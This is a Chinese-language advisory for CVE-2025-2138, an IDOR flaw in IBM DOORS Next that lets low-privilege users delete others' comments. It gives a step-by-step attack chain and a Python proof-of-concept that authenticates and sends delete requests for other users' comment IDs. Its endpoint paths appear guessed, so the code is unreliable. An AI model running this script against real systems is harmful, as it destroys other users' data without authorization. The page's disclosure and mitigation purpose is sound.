CVE-2025-2138 IBM DOORS Next 权限绕过漏洞

漏洞信息

漏洞编号

CVE-2025-2138

漏洞类型

权限绕过/不安全直接对象引用(IDOR)

CVSS评分

3.5 低危

攻击向量

邻接 (AV:A)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

IBM Engineering Requirements Management DOORS Next

漏洞概述

CVE-2025-2138是IBM Engineering Requirements Management DOORS Next（IBM工程需求管理解决方案）中的一个权限绕过漏洞。该漏洞存在于DOORS Next 7.0.2、7.0.3和7.1版本中，允许网络上已认证的低权限用户删除其他用户的评论内容。

该漏洞的根本原因在于服务器端安全策略依赖于客户端的强制执行机制，这是一种常见的安全设计缺陷。在正常的Web应用架构中，安全控制（如权限验证、访问控制）应当在服务器端进行严格的校验和强制执行。然而，DOORS Next在处理评论删除请求时，将部分安全验证逻辑放在了客户端（如JavaScript），攻击者可以通过拦截HTTP请求、修改参数或绕过客户端验证等方式，绕过这些安全检查，直接向服务器发送删除其他用户评论的请求。

由于该漏洞的攻击向量为邻接网络（AV:A），攻击者需要与目标系统处于同一局域网或相邻网络环境中才能实施攻击。攻击需要低权限认证（PR:L），无需用户交互（UI:N），且对机密性和可用性无影响，仅对完整性产生低影响（I:L）。该漏洞的CVSS评分为3.5，属于低危级别，但在大规模协作的企业环境中，未经授权删除他人评论可能导致重要需求讨论信息的丢失，影响团队协作效率和审计追溯能力。

技术细节

该漏洞的技术原理在于服务器端安全控制的缺失或弱化。DOORS Next在处理评论删除功能时，未在服务器端对请求者与评论所有者之间的关系进行充分的权限验证，而是依赖客户端代码来执行这些安全检查。

具体利用方式如下：
1. 攻击者首先以合法用户身份登录DOORS Next系统，获取有效的会话凭证。
2. 攻击者通过浏览器开发者工具或代理工具（如Burp Suite）拦截正常的评论删除请求。
3. 在拦截的请求中，攻击者将评论标识符（comment ID）或相关参数修改为其他用户的评论标识符。
4. 由于服务器仅依赖客户端验证，修改后的请求被服务器接受并处理，导致其他用户的评论被删除。

这种漏洞属于典型的Insecure Direct Object Reference（IDOR，不安全的直接对象引用）类别。修复方案应当在服务器端对每个删除请求进行严格的权限校验，确保只有评论的创建者或具有相应管理权限的用户才能执行删除操作。IBM已通过官方补丁修复了该问题，建议用户及时升级到修复版本。

攻击链分析

STEP 1

步骤1：网络定位

攻击者需要与目标DOORS Next服务器处于同一局域网或相邻网络环境中（AV:A邻接网络向量），通过端口扫描或信息收集确认目标系统的IP地址和端口。

STEP 2

步骤2：获取认证凭证

攻击者需要拥有一个合法的低权限用户账号（PR:L），可以通过社会工程、凭证泄露或其他方式获取。该漏洞需要认证后才能利用。

STEP 3

步骤3：登录系统

使用合法凭证登录DOORS Next系统，建立有效的会话连接，获取必要的认证Cookie或Token。

STEP 4

步骤4：枚举目标评论

通过浏览需求工件、查看讨论历史或调用API接口，枚举出属于其他用户的评论标识符（comment ID）。

STEP 5

步骤5：拦截并修改请求

使用浏览器开发者工具或代理工具（如Burp Suite、OWASP ZAP）拦截正常的删除评论请求，将评论ID修改为其他用户的评论ID。

STEP 6

步骤6：绕过客户端验证

由于服务器端缺少权限验证，攻击者绕过客户端的安全检查，直接向服务器发送修改后的删除请求。

STEP 7

步骤7：删除他人评论

服务器接受未经授权的删除请求，成功删除其他用户的评论内容，破坏协作数据的完整性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-2138 PoC - IBM DOORS Next Comment Deletion IDOR
# This PoC demonstrates how an authenticated user can delete comments
# belonging to other users by manipulating request parameters.

import requests

# Target DOORS Next server configuration
TARGET_URL = "https://target-doors-next-server:9443/rm"
USERNAME = "attacker_user"
PASSWORD = "attacker_password"

# Step 1: Authenticate to obtain a valid session
session = requests.Session()
login_url = f"{TARGET_URL}/auth/j_security_check"
login_data = {
    "j_username": USERNAME,
    "j_password": PASSWORD
}
response = session.post(login_url, data=login_data, verify=False)

if response.status_code != 200:
    print("[-] Authentication failed")
    exit(1)

print("[+] Authentication successful")

# Step 2: Enumerate comment IDs belonging to other users
# Comments can be found by browsing artifacts or through the API
# Example comment IDs that belong to other users
target_comment_ids = [12345, 12346, 12347, 12348]

# Step 3: Attempt to delete comments owned by other users
# The server fails to verify ownership, relying on client-side checks
delete_url_template = f"{TARGET_URL}/comment/{{comment_id}}"

for comment_id in target_comment_ids:
    delete_url = delete_url_template.format(comment_id=comment_id)

    # Send DELETE request with the attacker's session
    # Server-side validation is missing, so the request succeeds
    headers = {
        "Content-Type": "application/json",
        "X-Requested-With": "XMLHttpRequest"
    }

    response = session.delete(delete_url, headers=headers, verify=False)

    if response.status_code in [200, 204]:
        print(f"[+] Successfully deleted comment ID: {comment_id}")
    else:
        print(f"[-] Failed to delete comment ID: {comment_id}, Status: {response.status_code}")

print("[+] Exploit completed")

# Alternative: Using PUT/POST with action parameter
# Some versions may use POST with a delete action parameter
delete_payload = {
    "action": "delete",
    "commentId": 12345,
    "artifactId": 67890
}

response = session.post(
    f"{TARGET_URL}/comment/action",
    json=delete_payload,
    headers=headers,
    verify=False
)

if response.status_code in [200, 204]:
    print("[+] Successfully deleted comment via POST action")

影响范围

IBM Engineering Requirements Management DOORS Next 7.0.2

IBM Engineering Requirements Management DOORS Next 7.0.3

IBM Engineering Requirements Management DOORS Next 7.1

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）限制DOORS Next系统的网络访问，仅允许可信网络中的用户访问；2）加强用户认证管理，定期更换密码，启用多因素认证；3）部署网络监控工具，检测异常的API调用模式；4）定期备份评论数据，以便在发生未授权删除时进行恢复；5）关注IBM官方安全公告，及时应用安全补丁。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-2138
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-2138
3 Details https://www.cvedetails.com/cve/CVE-2025-2138/
4 VulDB https://vuldb.com/cve/CVE-2025-2138
5 Link https://www.ibm.com/support/pages/node/7247716